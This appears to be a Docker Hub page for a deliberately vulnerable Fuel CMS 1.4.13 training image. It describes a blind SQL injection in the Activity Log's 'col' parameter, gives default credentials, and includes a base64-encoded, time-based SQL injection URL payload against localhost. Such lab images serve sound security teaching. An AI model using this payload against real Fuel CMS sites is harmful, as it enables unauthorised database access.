Sign inSign up

zerozer/fuelcms-vulnerable

By zerozer

Updated 5 months ago

Vulnerable Fuel CMS 1.4.13 - Blind SQL Injection (EDB-50523). Educational purposes only.

Image
0

100

zerozer/fuelcms-vulnerable repository overview

Fuel CMS 1.4.13 - Vulnerable Image

WARNING: This is a deliberately vulnerable web application for educational purposes only. Do not deploy in a production environment.

Vulnerability

This image contains a Blind SQL Injection vulnerability in the col parameter of the Activity Log page.

Exploit-DB: https://www.exploit-db.com/exploits/50523

Usage

Use the provided docker-compose.yml to run the application with the required MySQL database. Then visit http://localhost:8080/fuel to complete setup.

Default credentials: admin/admin

Exploit

After logging in, navigate to the Activity Log and inject the following payload into the URL: aHR0cDovL2xvY2FsaG9zdDo4MDgwL2Z1ZWwvZnVlbC9sb2dzL2l0ZW1zP3R5cGU9ZGVidWcmc2VhcmNoX3Rlcm09JmxpbWl0PTUwJnZpZXdfdHlwZT1saXN0Jm9mZnNldD0wJm9yZGVyPWRlc2MmY29sPWVudHJ5X2RhdGUgYW5kIChzZWxlY3QgKiBmcm9tKHNlbGVjdChzbGVlcCg1KSkpYSkmZnVlbF9pbmxpbmU9MA==

**Payload is encoded using base64 to prevent DockerHub from mistaking the SQL as an attack. Use whatever method you want to decode it.

Tag summary

Content type

Image

Digest

sha256:e6137e39a

Size

177.3 MB

Last updated

5 months ago

docker pull zerozer/fuelcms-vulnerable:1.4.13